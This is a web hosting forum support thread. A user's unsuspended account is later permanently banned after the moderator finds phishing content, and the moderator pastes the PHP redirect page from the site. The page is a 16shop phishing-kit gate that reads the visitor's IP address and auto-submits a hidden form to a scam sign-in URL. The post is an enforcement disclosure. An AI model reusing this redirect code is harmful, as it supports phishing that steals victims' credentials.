jujujay Posted October 25, 2020 Share Posted October 25, 2020 My account was suspended I think it was due to multiple accounts. Pls deleted the other on Johnny server it was created as a test domain name is secure-network manager.heliohost.orgWith username boneman. Pls unsuspend my other account with username Jujujay Quote Link to comment Share on other sites More sharing options...
jujujay Posted October 25, 2020 Author Share Posted October 25, 2020 Thanks Quote Link to comment Share on other sites More sharing options...
wolstech Posted October 25, 2020 Share Posted October 25, 2020 What do you plan to use that account for? Quote Link to comment Share on other sites More sharing options...
jujujay Posted October 25, 2020 Author Share Posted October 25, 2020 It's for my school project. Quote Link to comment Share on other sites More sharing options...
wolstech Posted October 25, 2020 Share Posted October 25, 2020 Unsuspended. If you're building a support website of some kind, do not use the logos or likeness of any legitimate company such as paypal or a bank. Doing so will result in a permanent ban for phishing. Quote Link to comment Share on other sites More sharing options...
jujujay Posted October 25, 2020 Author Share Posted October 25, 2020 Okay Quote Link to comment Share on other sites More sharing options...
wolstech Posted October 31, 2020 Share Posted October 31, 2020 Chrome just started flagging your domain as malware, so you're now permanently suspended. Looking at the contents, I agree with it's detection (IP logger and a redirect to what is likely a phishing site that wasn't uploaded yet). It even mentions in the code that it's supposed to be a redirect to a scam site. HelioHost does not condone illegal activity of any type, including phishing or the use of malware or malicious scripts. <?php $url = "https://secure-support.heliohost.us/Page/signin/app/signin"; // URL scam anda (Wajib menggunakan HTTPS) $password = "16shop"; // Password Scam (sesuaikan dengan password di config scam) function getUserIPs() { $client = @$_SERVER['HTTP_CLIENT_IP']; $forward = @$_SERVER['HTTP_X_FORWARDED_FOR']; $remote = $_SERVER['REMOTE_ADDR']; if(filter_var($client, FILTER_VALIDATE_IP)) { $ip = $client; } elseif(filter_var($forward, FILTER_VALIDATE_IP)) { $ip = $forward; } else { $ip = $remote; } return $ip; } $ip = getUserIPs(); ?> <html> <title>Redirecting.....</title> <body onload="document.form.submit()"> <form name="form" id="form" action="<?php echo $url;?>" method="POST"> <div style="display:none;"> <input name="<?php echo md5($ip);?>" value="<?php echo md5($password);?>"> <input type="submit" value="Continue"> </div> </form> </body> </html> Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.